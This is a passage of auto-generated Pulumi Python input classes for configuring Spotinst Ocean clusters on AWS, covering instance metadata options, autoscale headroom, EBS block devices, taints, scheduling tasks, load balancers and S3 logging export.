class OceanInstanceMetadataOptionsArgs:
def __init__(__self__, *,
http_tokens: pulumi.Input[str],
http_put_response_hop_limit: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] http_tokens: Determines if a signed token is required or not. Valid values: `optional` or `required`.
:param pulumi.Input[int] http_put_response_hop_limit: An integer from 1 through 64. The desired HTTP PUT response hop limit for instance metadata requests. The larger the number, the further the instance metadata requests can travel.
"""
pulumi.set(__self__, "http_tokens", http_tokens)
if http_put_response_hop_limit is not None:
pulumi.set(__self__, "http_put_response_hop_limit", http_put_response_hop_limit)
@property
@pulumi.getter(name="httpTokens")
def http_tokens(self) -> pulumi.Input[str]:
"""
Determines if a signed token is required or not. Valid values: `optional` or `required`.
"""
return pulumi.get(self, "http_tokens")
@http_tokens.setter
def http_tokens(self, value: pulumi.Input[str]):
pulumi.set(self, "http_tokens", value)
@property
@pulumi.getter(name="httpPutResponseHopLimit")
def http_put_response_hop_limit(self) -> Optional[pulumi.Input[int]]:
"""
An integer from 1 through 64. The desired HTTP PUT response hop limit for instance metadata requests. The larger the number, the further the instance metadata requests can travel.
"""
return pulumi.get(self, "http_put_response_hop_limit")
@http_put_response_hop_limit.setter
def http_put_response_hop_limit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "http_put_response_hop_limit", value)
@pulumi.input_type
class OceanLaunchSpecAutoscaleHeadroomArgs:
def __init__(__self__, *,
num_of_units: pulumi.Input[int],
cpu_per_unit: Optional[pulumi.Input[int]] = None,
gpu_per_unit: Optional[pulumi.Input[int]] = None,
memory_per_unit: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] num_of_units: The number of units to retain as headroom, where each unit has the defined headroom CPU, memory and GPU.
:param pulumi.Input[int] cpu_per_unit: Optionally configure the number of CPUs to allocate for each headroom unit. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
:param pulumi.Input[int] gpu_per_unit: Optionally configure the number of GPUS to allocate for each headroom unit.
:param pulumi.Input[int] memory_per_unit: Optionally configure the amount of memory (MiB) to allocate for each headroom unit.
"""
pulumi.set(__self__, "num_of_units", num_of_units)
if cpu_per_unit is not None:
pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
if gpu_per_unit is not None:
pulumi.set(__self__, "gpu_per_unit", gpu_per_unit)
if memory_per_unit is not None:
pulumi.set(__self__, "memory_per_unit", memory_per_unit)
@property
@pulumi.getter(name="numOfUnits")
def num_of_units(self) -> pulumi.Input[int]:
"""
The number of units to retain as headroom, where each unit has the defined headroom CPU, memory and GPU.
"""
return pulumi.get(self, "num_of_units")
@num_of_units.setter
def num_of_units(self, value: pulumi.Input[int]):
pulumi.set(self, "num_of_units", value)
@property
@pulumi.getter(name="cpuPerUnit")
def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
Optionally configure the number of CPUs to allocate for each headroom unit. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
"""
return pulumi.get(self, "cpu_per_unit")
@cpu_per_unit.setter
def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_per_unit", value)
@property
@pulumi.getter(name="gpuPerUnit")
def gpu_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
Optionally configure the number of GPUS to allocate for each headroom unit.
"""
return pulumi.get(self, "gpu_per_unit")
@gpu_per_unit.setter
def gpu_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "gpu_per_unit", value)
@property
@pulumi.getter(name="memoryPerUnit")
def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
Optionally configure the amount of memory (MiB) to allocate for each headroom unit.
"""
return pulumi.get(self, "memory_per_unit")
@memory_per_unit.setter
def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "memory_per_unit", value)
@pulumi.input_type
class OceanLaunchSpecBlockDeviceMappingArgs:
def __init__(__self__, *,
device_name: Optional[pulumi.Input[str]] = None,
ebs: Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsArgs']] = None,
no_device: Optional[pulumi.Input[str]] = None,
virtual_name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] device_name: String. Set device name. (Example: `/dev/xvda`).
:param pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsArgs'] ebs: Object. Set Elastic Block Store properties .
:param pulumi.Input[str] no_device: String. Suppresses the specified device included in the block device mapping of the AMI.
"""
if device_name is not None:
pulumi.set(__self__, "device_name", device_name)
if ebs is not None:
pulumi.set(__self__, "ebs", ebs)
if no_device is not None:
pulumi.set(__self__, "no_device", no_device)
if virtual_name is not None:
pulumi.set(__self__, "virtual_name", virtual_name)
@property
@pulumi.getter(name="deviceName")
def device_name(self) -> Optional[pulumi.Input[str]]:
"""
String. Set device name. (Example: `/dev/xvda`).
"""
return pulumi.get(self, "device_name")
@device_name.setter
def device_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_name", value)
@property
@pulumi.getter
def ebs(self) -> Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsArgs']]:
"""
Object. Set Elastic Block Store properties .
"""
return pulumi.get(self, "ebs")
@ebs.setter
def ebs(self, value: Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsArgs']]):
pulumi.set(self, "ebs", value)
@property
@pulumi.getter(name="noDevice")
def no_device(self) -> Optional[pulumi.Input[str]]:
"""
String. Suppresses the specified device included in the block device mapping of the AMI.
"""
return pulumi.get(self, "no_device")
@no_device.setter
def no_device(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "no_device", value)
@property
@pulumi.getter(name="virtualName")
def virtual_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "virtual_name")
@virtual_name.setter
def virtual_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_name", value)
@pulumi.input_type
class OceanLaunchSpecBlockDeviceMappingEbsArgs:
def __init__(__self__, *,
delete_on_termination: Optional[pulumi.Input[bool]] = None,
dynamic_volume_size: Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs']] = None,
encrypted: Optional[pulumi.Input[bool]] = None,
iops: Optional[pulumi.Input[int]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
snapshot_id: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
volume_size: Optional[pulumi.Input[int]] = None,
volume_type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[bool] delete_on_termination: Boolean. Flag to delete the EBS on instance termination.
:param pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs'] dynamic_volume_size: Object. Set dynamic volume size properties. When using this object, you cannot use volumeSize. You must use one or the other.
:param pulumi.Input[bool] encrypted: Boolean. Enables [EBS encryption](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html) on the volume.
:param pulumi.Input[int] iops: Int. The number of I/O operations per second (IOPS) that the volume supports.
:param pulumi.Input[str] kms_key_id: String. Identifier (key ID, key alias, ID ARN, or alias ARN) for a customer managed CMK under which the EBS volume is encrypted.
:param pulumi.Input[str] snapshot_id: (Optional) String. The Snapshot ID to mount by.
:param pulumi.Input[int] throughput: The amount of data transferred to or from a storage device per second, you can use this param just in a case that `volume_type` = `gp3`.
:param pulumi.Input[int] volume_size: Int. The size, in GB of the volume.
:param pulumi.Input[str] volume_type: String. The type of the volume. (Example: `gp2`).
"""
if delete_on_termination is not None:
pulumi.set(__self__, "delete_on_termination", delete_on_termination)
if dynamic_volume_size is not None:
pulumi.set(__self__, "dynamic_volume_size", dynamic_volume_size)
if encrypted is not None:
pulumi.set(__self__, "encrypted", encrypted)
if iops is not None:
pulumi.set(__self__, "iops", iops)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if snapshot_id is not None:
pulumi.set(__self__, "snapshot_id", snapshot_id)
if throughput is not None:
pulumi.set(__self__, "throughput", throughput)
if volume_size is not None:
pulumi.set(__self__, "volume_size", volume_size)
if volume_type is not None:
pulumi.set(__self__, "volume_type", volume_type)
@property
@pulumi.getter(name="deleteOnTermination")
def delete_on_termination(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean. Flag to delete the EBS on instance termination.
"""
return pulumi.get(self, "delete_on_termination")
@delete_on_termination.setter
def delete_on_termination(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "delete_on_termination", value)
@property
@pulumi.getter(name="dynamicVolumeSize")
def dynamic_volume_size(self) -> Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs']]:
"""
Object. Set dynamic volume size properties. When using this object, you cannot use volumeSize. You must use one or the other.
"""
return pulumi.get(self, "dynamic_volume_size")
@dynamic_volume_size.setter
def dynamic_volume_size(self, value: Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs']]):
pulumi.set(self, "dynamic_volume_size", value)
@property
@pulumi.getter
def encrypted(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean. Enables [EBS encryption](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html) on the volume.
"""
return pulumi.get(self, "encrypted")
@encrypted.setter
def encrypted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "encrypted", value)
@property
@pulumi.getter
def iops(self) -> Optional[pulumi.Input[int]]:
"""
Int. The number of I/O operations per second (IOPS) that the volume supports.
"""
return pulumi.get(self, "iops")
@iops.setter
def iops(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "iops", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
String. Identifier (key ID, key alias, ID ARN, or alias ARN) for a customer managed CMK under which the EBS volume is encrypted.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="snapshotId")
def snapshot_id(self) -> Optional[pulumi.Input[str]]:
"""
(Optional) String. The Snapshot ID to mount by.
"""
return pulumi.get(self, "snapshot_id")
@snapshot_id.setter
def snapshot_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_id", value)
@property
@pulumi.getter
def throughput(self) -> Optional[pulumi.Input[int]]:
"""
The amount of data transferred to or from a storage device per second, you can use this param just in a case that `volume_type` = `gp3`.
"""
return pulumi.get(self, "throughput")
@throughput.setter
def throughput(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput", value)
@property
@pulumi.getter(name="volumeSize")
def volume_size(self) -> Optional[pulumi.Input[int]]:
"""
Int. The size, in GB of the volume.
"""
return pulumi.get(self, "volume_size")
@volume_size.setter
def volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "volume_size", value)
@property
@pulumi.getter(name="volumeType")
def volume_type(self) -> Optional[pulumi.Input[str]]:
"""
String. The type of the volume. (Example: `gp2`).
"""
return pulumi.get(self, "volume_type")
@volume_type.setter
def volume_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "volume_type", value)
@pulumi.input_type
class OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs:
def __init__(__self__, *,
base_size: pulumi.Input[int],
resource: pulumi.Input[str],
size_per_resource_unit: pulumi.Input[int]):
"""
:param pulumi.Input[int] base_size: Int. Initial size for volume. (Example: 50)
:param pulumi.Input[str] resource: String. Resource type to increase volume size dynamically by. (Valid values: `CPU`)
:param pulumi.Input[int] size_per_resource_unit: Int. Additional size (in GB) per resource unit. (Example: `baseSize=50`, `sizePerResourceUnit=20`, and instance with 2 CPU is launched; its total disk size will be: 90GB)
"""
pulumi.set(__self__, "base_size", base_size)
pulumi.set(__self__, "resource", resource)
pulumi.set(__self__, "size_per_resource_unit", size_per_resource_unit)
@property
@pulumi.getter(name="baseSize")
def base_size(self) -> pulumi.Input[int]:
"""
Int. Initial size for volume. (Example: 50)
"""
return pulumi.get(self, "base_size")
@base_size.setter
def base_size(self, value: pulumi.Input[int]):
pulumi.set(self, "base_size", value)
@property
@pulumi.getter
def resource(self) -> pulumi.Input[str]:
"""
String. Resource type to increase volume size dynamically by. (Valid values: `CPU`)
"""
return pulumi.get(self, "resource")
@resource.setter
def resource(self, value: pulumi.Input[str]):
pulumi.set(self, "resource", value)
@property
@pulumi.getter(name="sizePerResourceUnit")
def size_per_resource_unit(self) -> pulumi.Input[int]:
"""
Int. Additional size (in GB) per resource unit. (Example: `baseSize=50`, `sizePerResourceUnit=20`, and instance with 2 CPU is launched; its total disk size will be: 90GB)
"""
return pulumi.get(self, "size_per_resource_unit")
@size_per_resource_unit.setter
def size_per_resource_unit(self, value: pulumi.Input[int]):
pulumi.set(self, "size_per_resource_unit", value)
@pulumi.input_type
class OceanLaunchSpecCreateOptionsArgs:
def __init__(__self__, *,
initial_nodes: pulumi.Input[int]):
"""
:param pulumi.Input[int] initial_nodes: When set to an integer greater than 0, a corresponding amount of nodes will be launched from the created Virtual Node Group. The parameter is recommended in case the use_as_template_only (in aws.Ocean resource) is set to true during Ocean resource creation.
"""
pulumi.set(__self__, "initial_nodes", initial_nodes)
@property
@pulumi.getter(name="initialNodes")
def initial_nodes(self) -> pulumi.Input[int]:
"""
When set to an integer greater than 0, a corresponding amount of nodes will be launched from the created Virtual Node Group. The parameter is recommended in case the use_as_template_only (in aws.Ocean resource) is set to true during Ocean resource creation.
"""
return pulumi.get(self, "initial_nodes")
@initial_nodes.setter
def initial_nodes(self, value: pulumi.Input[int]):
pulumi.set(self, "initial_nodes", value)
@pulumi.input_type
class OceanLaunchSpecDeleteOptionsArgs:
def __init__(__self__, *,
force_delete: pulumi.Input[bool]):
"""
:param pulumi.Input[bool] force_delete: When set to `true`, delete even if it is the last Virtual Node Group (also, the default Virtual Node Group must be configured with `useAsTemlateOnly = true`). Should be set at creation or update, but will be used only at deletion.
"""
pulumi.set(__self__, "force_delete", force_delete)
@property
@pulumi.getter(name="forceDelete")
def force_delete(self) -> pulumi.Input[bool]:
"""
When set to `true`, delete even if it is the last Virtual Node Group (also, the default Virtual Node Group must be configured with `useAsTemlateOnly = true`). Should be set at creation or update, but will be used only at deletion.
"""
return pulumi.get(self, "force_delete")
@force_delete.setter
def force_delete(self, value: pulumi.Input[bool]):
pulumi.set(self, "force_delete", value)
@pulumi.input_type
class OceanLaunchSpecElasticIpPoolArgs:
def __init__(__self__, *,
tag_selector: Optional[pulumi.Input['OceanLaunchSpecElasticIpPoolTagSelectorArgs']] = None):
"""
:param pulumi.Input['OceanLaunchSpecElasticIpPoolTagSelectorArgs'] tag_selector: A key-value pair, which defines an Elastic IP from the customer pool. Can be null.
"""
if tag_selector is not None:
pulumi.set(__self__, "tag_selector", tag_selector)
@property
@pulumi.getter(name="tagSelector")
def tag_selector(self) -> Optional[pulumi.Input['OceanLaunchSpecElasticIpPoolTagSelectorArgs']]:
"""
A key-value pair, which defines an Elastic IP from the customer pool. Can be null.
"""
return pulumi.get(self, "tag_selector")
@tag_selector.setter
def tag_selector(self, value: Optional[pulumi.Input['OceanLaunchSpecElasticIpPoolTagSelectorArgs']]):
pulumi.set(self, "tag_selector", value)
@pulumi.input_type
class OceanLaunchSpecElasticIpPoolTagSelectorArgs:
def __init__(__self__, *,
tag_key: pulumi.Input[str],
tag_value: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] tag_key: Elastic IP tag key. The Virtual Node Group will consider all Elastic IPs tagged with this tag as a part of the Elastic IP pool to use.
:param pulumi.Input[str] tag_value: Elastic IP tag value. Can be null.
"""
pulumi.set(__self__, "tag_key", tag_key)
if tag_value is not None:
pulumi.set(__self__, "tag_value", tag_value)
@property
@pulumi.getter(name="tagKey")
def tag_key(self) -> pulumi.Input[str]:
"""
Elastic IP tag key. The Virtual Node Group will consider all Elastic IPs tagged with this tag as a part of the Elastic IP pool to use.
"""
return pulumi.get(self, "tag_key")
@tag_key.setter
def tag_key(self, value: pulumi.Input[str]):
pulumi.set(self, "tag_key", value)
@property
@pulumi.getter(name="tagValue")
def tag_value(self) -> Optional[pulumi.Input[str]]:
"""
Elastic IP tag value. Can be null.
"""
return pulumi.get(self, "tag_value")
@tag_value.setter
def tag_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag_value", value)
@pulumi.input_type
class OceanLaunchSpecLabelArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
value: pulumi.Input[str]):
"""
:param pulumi.Input[str] key: The taint key.
:param pulumi.Input[str] value: The taint value.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The taint key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The taint value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class OceanLaunchSpecResourceLimitArgs:
def __init__(__self__, *,
max_instance_count: Optional[pulumi.Input[int]] = None,
min_instance_count: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] max_instance_count: Set a maximum number of instances per Virtual Node Group. Can be null. If set, value must be greater than or equal to 0.
:param pulumi.Input[int] min_instance_count: Set a minimum number of instances per Virtual Node Group. Can be null. If set, value must be greater than or equal to 0.
"""
if max_instance_count is not None:
pulumi.set(__self__, "max_instance_count", max_instance_count)
if min_instance_count is not None:
pulumi.set(__self__, "min_instance_count", min_instance_count)
@property
@pulumi.getter(name="maxInstanceCount")
def max_instance_count(self) -> Optional[pulumi.Input[int]]:
"""
Set a maximum number of instances per Virtual Node Group. Can be null. If set, value must be greater than or equal to 0.
"""
return pulumi.get(self, "max_instance_count")
@max_instance_count.setter
def max_instance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_instance_count", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> Optional[pulumi.Input[int]]:
"""
Set a minimum number of instances per Virtual Node Group. Can be null. If set, value must be greater than or equal to 0.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_instance_count", value)
@pulumi.input_type
class OceanLaunchSpecSchedulingTaskArgs:
def __init__(__self__, *,
cron_expression: pulumi.Input[str],
is_enabled: pulumi.Input[bool],
task_type: pulumi.Input[str],
task_headrooms: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLaunchSpecSchedulingTaskTaskHeadroomArgs']]]] = None):
"""
:param pulumi.Input[str] cron_expression: A valid cron expression. For example : " * * * * * ". The cron job runs in UTC time and is in Unix cron format.
:param pulumi.Input[bool] is_enabled: Describes whether the task is enabled. When True, the task runs. When False, it does not run.
:param pulumi.Input[str] task_type: The activity that you are scheduling. Valid values: "manualHeadroomUpdate".
:param pulumi.Input[Sequence[pulumi.Input['OceanLaunchSpecSchedulingTaskTaskHeadroomArgs']]] task_headrooms: The config of this scheduled task. Depends on the value of taskType.
"""
pulumi.set(__self__, "cron_expression", cron_expression)
pulumi.set(__self__, "is_enabled", is_enabled)
pulumi.set(__self__, "task_type", task_type)
if task_headrooms is not None:
pulumi.set(__self__, "task_headrooms", task_headrooms)
@property
@pulumi.getter(name="cronExpression")
def cron_expression(self) -> pulumi.Input[str]:
"""
A valid cron expression. For example : " * * * * * ". The cron job runs in UTC time and is in Unix cron format.
"""
return pulumi.get(self, "cron_expression")
@cron_expression.setter
def cron_expression(self, value: pulumi.Input[str]):
pulumi.set(self, "cron_expression", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> pulumi.Input[bool]:
"""
Describes whether the task is enabled. When True, the task runs. When False, it does not run.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
The activity that you are scheduling. Valid values: "manualHeadroomUpdate".
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter(name="taskHeadrooms")
def task_headrooms(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanLaunchSpecSchedulingTaskTaskHeadroomArgs']]]]:
"""
The config of this scheduled task. Depends on the value of taskType.
"""
return pulumi.get(self, "task_headrooms")
@task_headrooms.setter
def task_headrooms(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLaunchSpecSchedulingTaskTaskHeadroomArgs']]]]):
pulumi.set(self, "task_headrooms", value)
@pulumi.input_type
class OceanLaunchSpecSchedulingTaskTaskHeadroomArgs:
def __init__(__self__, *,
num_of_units: pulumi.Input[int],
cpu_per_unit: Optional[pulumi.Input[int]] = None,
gpu_per_unit: Optional[pulumi.Input[int]] = None,
memory_per_unit: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] num_of_units: The number of units to retain as headroom, where each unit has the defined headroom CPU, memory and GPU.
:param pulumi.Input[int] cpu_per_unit: Optionally configure the number of CPUs to allocate for each headroom unit. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
:param pulumi.Input[int] gpu_per_unit: Optionally configure the number of GPUS to allocate for each headroom unit.
:param pulumi.Input[int] memory_per_unit: Optionally configure the amount of memory (MiB) to allocate for each headroom unit.
"""
pulumi.set(__self__, "num_of_units", num_of_units)
if cpu_per_unit is not None:
pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
if gpu_per_unit is not None:
pulumi.set(__self__, "gpu_per_unit", gpu_per_unit)
if memory_per_unit is not None:
pulumi.set(__self__, "memory_per_unit", memory_per_unit)
@property
@pulumi.getter(name="numOfUnits")
def num_of_units(self) -> pulumi.Input[int]:
"""
The number of units to retain as headroom, where each unit has the defined headroom CPU, memory and GPU.
"""
return pulumi.get(self, "num_of_units")
@num_of_units.setter
def num_of_units(self, value: pulumi.Input[int]):
pulumi.set(self, "num_of_units", value)
@property
@pulumi.getter(name="cpuPerUnit")
def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
Optionally configure the number of CPUs to allocate for each headroom unit. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
"""
return pulumi.get(self, "cpu_per_unit")
@cpu_per_unit.setter
def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_per_unit", value)
@property
@pulumi.getter(name="gpuPerUnit")
def gpu_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
Optionally configure the number of GPUS to allocate for each headroom unit.
"""
return pulumi.get(self, "gpu_per_unit")
@gpu_per_unit.setter
def gpu_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "gpu_per_unit", value)
@property
@pulumi.getter(name="memoryPerUnit")
def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
Optionally configure the amount of memory (MiB) to allocate for each headroom unit.
"""
return pulumi.get(self, "memory_per_unit")
@memory_per_unit.setter
def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "memory_per_unit", value)
@pulumi.input_type
class OceanLaunchSpecStrategyArgs:
def __init__(__self__, *,
spot_percentage: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] spot_percentage: When set, Ocean will proactively try to maintain as close as possible to the percentage of Spot instances out of all the Virtual Node Group instances.
"""
if spot_percentage is not None:
pulumi.set(__self__, "spot_percentage", spot_percentage)
@property
@pulumi.getter(name="spotPercentage")
def spot_percentage(self) -> Optional[pulumi.Input[int]]:
"""
When set, Ocean will proactively try to maintain as close as possible to the percentage of Spot instances out of all the Virtual Node Group instances.
"""
return pulumi.get(self, "spot_percentage")
@spot_percentage.setter
def spot_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "spot_percentage", value)
@pulumi.input_type
class OceanLaunchSpecTagArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
value: pulumi.Input[str]):
"""
:param pulumi.Input[str] key: The taint key.
:param pulumi.Input[str] value: The taint value.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The taint key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The taint value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class OceanLaunchSpecTaintArgs:
def __init__(__self__, *,
effect: pulumi.Input[str],
key: pulumi.Input[str],
value: pulumi.Input[str]):
"""
:param pulumi.Input[str] effect: The effect of the taint. Valid values: `"NoSchedule"`, `"PreferNoSchedule"`, `"NoExecute"`.
:param pulumi.Input[str] key: The taint key.
:param pulumi.Input[str] value: The taint value.
"""
pulumi.set(__self__, "effect", effect)
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def effect(self) -> pulumi.Input[str]:
"""
The effect of the taint. Valid values: `"NoSchedule"`, `"PreferNoSchedule"`, `"NoExecute"`.
"""
return pulumi.get(self, "effect")
@effect.setter
def effect(self, value: pulumi.Input[str]):
pulumi.set(self, "effect", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The taint key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The taint value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class OceanLaunchSpecUpdatePolicyArgs:
def __init__(__self__, *,
should_roll: pulumi.Input[bool],
roll_config: Optional[pulumi.Input['OceanLaunchSpecUpdatePolicyRollConfigArgs']] = None):
pulumi.set(__self__, "should_roll", should_roll)
if roll_config is not None:
pulumi.set(__self__, "roll_config", roll_config)
@property
@pulumi.getter(name="shouldRoll")
def should_roll(self) -> pulumi.Input[bool]:
return pulumi.get(self, "should_roll")
@should_roll.setter
def should_roll(self, value: pulumi.Input[bool]):
pulumi.set(self, "should_roll", value)
@property
@pulumi.getter(name="rollConfig")
def roll_config(self) -> Optional[pulumi.Input['OceanLaunchSpecUpdatePolicyRollConfigArgs']]:
return pulumi.get(self, "roll_config")
@roll_config.setter
def roll_config(self, value: Optional[pulumi.Input['OceanLaunchSpecUpdatePolicyRollConfigArgs']]):
pulumi.set(self, "roll_config", value)
@pulumi.input_type
class OceanLaunchSpecUpdatePolicyRollConfigArgs:
def __init__(__self__, *,
batch_size_percentage: pulumi.Input[int]):
pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)
@property
@pulumi.getter(name="batchSizePercentage")
def batch_size_percentage(self) -> pulumi.Input[int]:
return pulumi.get(self, "batch_size_percentage")
@batch_size_percentage.setter
def batch_size_percentage(self, value: pulumi.Input[int]):
pulumi.set(self, "batch_size_percentage", value)
@pulumi.input_type
class OceanLoadBalancerArgs:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] arn: Required if type is set to `TARGET_GROUP`
:param pulumi.Input[str] name: Required if type is set to `CLASSIC`
:param pulumi.Input[str] type: Can be set to `CLASSIC` or `TARGET_GROUP`
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if name is not None:
pulumi.set(__self__, "name", name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
Required if type is set to `TARGET_GROUP`
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Required if type is set to `CLASSIC`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
Can be set to `CLASSIC` or `TARGET_GROUP`
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class OceanLoggingArgs:
def __init__(__self__, *,
export: Optional[pulumi.Input['OceanLoggingExportArgs']] = None):
"""
:param pulumi.Input['OceanLoggingExportArgs'] export: Logging Export configuration.
"""
if export is not None:
pulumi.set(__self__, "export", export)
@property
@pulumi.getter
def export(self) -> Optional[pulumi.Input['OceanLoggingExportArgs']]:
"""
Logging Export configuration.
"""
return pulumi.get(self, "export")
@export.setter
def export(self, value: Optional[pulumi.Input['OceanLoggingExportArgs']]):
pulumi.set(self, "export", value)
@pulumi.input_type
class OceanLoggingExportArgs:
def __init__(__self__, *,
s3s: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoggingExportS3Args']]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['OceanLoggingExportS3Args']]] s3s: Exports your cluster's logs to the S3 bucket and subdir configured on the S3 data integration given.
"""
if s3s is not None:
pulumi.set(__self__, "s3s", s3s)
@property
@pulumi.getter
def s3s(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoggingExportS3Args']]]]:
"""
Exports your cluster's logs to the S3 bucket and subdir configured on the S3 data integration given.
"""
return pulumi.get(self, "s3s")
@s3s.setter
def s3s(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoggingExportS3Args']]]]):
pulumi.set(self, "s3s", value)
